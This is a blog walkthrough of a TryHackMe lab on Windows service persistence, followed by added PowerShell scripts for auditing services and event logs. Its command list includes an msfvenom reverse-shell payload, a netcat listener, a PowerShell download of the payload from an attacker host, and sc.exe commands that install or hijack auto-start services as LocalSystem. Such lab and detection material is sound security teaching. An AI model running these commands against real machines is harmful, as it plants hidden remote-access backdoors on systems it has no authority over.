In this post, we cover the third part of Windows persistence techniques, specifically backdooring Windows services, as part of the TryHackMe Windows Local Persistence room.

Windows services offer a great way to establish persistence since they can be configured to run in the background whenever the victim machine is started. If we can leverage any service to run something for us, we can regain control of the victim machine each time it is started.

A service is basically an executable that runs in the background. When configuring a service, you define which executable will be used and select if the service will automatically run when the machine starts or should be manually started.

There are two main ways we can abuse services to establish persistence:

  • Create a new service that runs our payload.
  • Modify an existing one to execute our payload.

Method 1: Creating a Backdoor Service

My first approach is to create a new service that runs a malicious payload. I’ll use a tool called msfvenom to generate a payload, which is an executable file that will give me a reverse shell. Then, I’ll create a new service and configure it to run this payload automatically on startup.

The downside to this method is that a new, unfamiliar service might look suspicious to a system administrator or anyone investigating a potential security breach.

Method 2: Backdooring an Existing Service

My second method is a bit stealthier. Instead of creating a new service, I’ll modify an existing, legitimate one. I’ll change the service’s “binary path” to point to my malicious payload instead of its original executable. I’ll also set the service to start automatically and change its start name to run as LocalSystem to ensure it has full administrative privileges. This way, my backdoor is hidden within a service that’s expected to be running on the system.
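Both methods leave the same fingerprints in the service configuration: an auto-start service whose binary sits outside the Windows or Program Files directories, often unsigned, often running as LocalSystem. The following audit script is an added example and is not part of the original post or the TryHackMe room; it assumes an elevated PowerShell session on the host being checked, and the list of trusted directories is an assumption you should adjust for your own environment.

```powershell
# Added example (not from the original post): audit service configurations for the
# indicators that a created or backdoored service leaves behind. Assumes an elevated
# PowerShell session on the host being checked.

# Directories where legitimate service binaries normally live (assumed baseline; extend as needed).
$trustedRoots = @(
    $env:SystemRoot,
    ${env:ProgramFiles},
    ${env:ProgramFiles(x86)},
    "$env:ProgramData\Microsoft"   # Defender platform and a few other Microsoft services live here
) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() }

function Get-ServiceBinaryPath {
    # Strip arguments and quotes from a PathName such as
    #   "C:\Program Files\Foo\svc.exe" -k netsvcs   or   C:\Users\x\payload.exe
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        return $PathName.Split('"')[1]
    }
    # Unquoted: the binary ends at the first ".exe" token (case-insensitive)
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $PathName.Split(' ')[0]
}

function Get-SuspiciousServices {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc     = $_
        $exe     = Get-ServiceBinaryPath $svc.PathName
        $reasons = @()

        if ($exe) {
            $exeLower  = $exe.ToLowerInvariant()
            $inTrusted = $trustedRoots | Where-Object { $exeLower.StartsWith($_ + '\') }
            if (-not $inTrusted) { $reasons += "binary outside system directories: $exe" }

            if (Test-Path -LiteralPath $exe) {
                # Catalog-signed Windows binaries report Valid on current Windows versions;
                # an unsigned payload dropped by msfvenom reports NotSigned.
                $sig = Get-AuthenticodeSignature -FilePath $exe
                if ($sig.Status -ne 'Valid') { $reasons += "binary signature status: $($sig.Status)" }
            } else {
                $reasons += "binary not found on disk: $exe"
            }
        }

        # Auto-start plus LocalSystem is the combination both methods in this post produce;
        # record it so the analyst sees the full picture for each flagged service.
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Name      = $svc.Name
                StartMode = $svc.StartMode
                StartName = $svc.StartName
                PathName  = $svc.PathName
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

Get-SuspiciousServices | Format-Table -AutoSize -Wrap
```

Expect some noise from legitimate third-party services installed under other directories; the useful signal is the difference between this output and a baseline taken when the host was known-good, and any entry whose binary lives under a user profile, as both payloads in this walkthrough do.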

Technical Commands

Here are the commands I used in the terminal throughout the video:

Creating a new service:

  • sc.exe create THMservice binPath= "C:\Users\IEUser\Desktop\payload.exe" start= auto
  • sc.exe start THMservice2

Creating a payload with msfvenom:

  • sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload.exe
  • sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload_v2.exe

Setting up a Netcat listener:

  • nc -lvp 4545

Downloading a payload with PowerShell:

  • powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload.exe','C:\Users\IEUser\Desktop\payload.exe')"
  • powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload_v2.exe','C:\Users\IEUser\Desktop\payload_v2.exe')"

Enumerating services:

  • sc query state= all
  • sc.exe query THMservice3
  • sc.exe qc THMservice3

Reconfiguring an existing service:

  • sc.exe config THMservice3 binPath= "C:\Users\IEUser\Desktop\payload_v2.exe" start= auto obj= "LocalSystem"
  • sc.exe start THMservice3
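The commands above also leave a trail in the System event log: the Service Control Manager writes event 7045 when a service is installed (sc create) and event 7040 when a service's start type changes (sc config ... start= auto). The script below is an added example, not part of the original post or the TryHackMe room; it assumes an elevated session and that the System log has not been cleared.

```powershell
# Added example (not from the original post): list Service Control Manager events that
# service creation and reconfiguration generate. Assumes an elevated PowerShell session.

function Get-ServicePersistenceEvents {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)

    # 7045: a new service was installed          (Method 1, "sc create")
    # 7040: a service's start type was changed   (Method 2, "sc config ... start= auto")
    $events = Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7045, 7040
        StartTime    = $since
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        $p = $e.Properties | ForEach-Object { $_.Value }
        if ($e.Id -eq 7045) {
            # 7045 message parameters: Service Name, Service File Name, Service Type,
            # Service Start Type, Service Account
            [pscustomobject]@{
                Time    = $e.TimeCreated
                EventId = 7045
                Service = $p[0]
                Detail  = "installed; image=$($p[1]); start=$($p[3]); account=$($p[4])"
            }
        } else {
            # 7040 message parameters: service display name, old start type, new start type
            [pscustomobject]@{
                Time    = $e.TimeCreated
                EventId = 7040
                Service = $p[0]
                Detail  = "start type changed from '$($p[1])' to '$($p[2])'"
            }
        }
    }
}

# Installs whose image path is under a user profile, and any start-type change, deserve a
# second look: that is exactly what the two methods in this post produce.
Get-ServicePersistenceEvents -Days 30 |
    Where-Object { $_.Detail -match '\\Users\\' -or $_.EventId -eq 7040 } |
    Sort-Object Time |
    Format-Table -AutoSize -Wrap
```

Two caveats for the defender. First, changing only binPath= writes no Service Control Manager event; it silently rewrites the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name>, so this log check must be paired with a configuration audit or with registry auditing (Security event 4657 with a SACL on the Services key, or Sysmon event 13). Second, Security event 4697 records the same service installation as 7045 but only when "Audit Security System Extension" is enabled, which it is not by default.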

TryHackMe Windows Local Persistence Room Answers

Insert flag7 here

Insert flag8 here

Video Walk-Through


About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
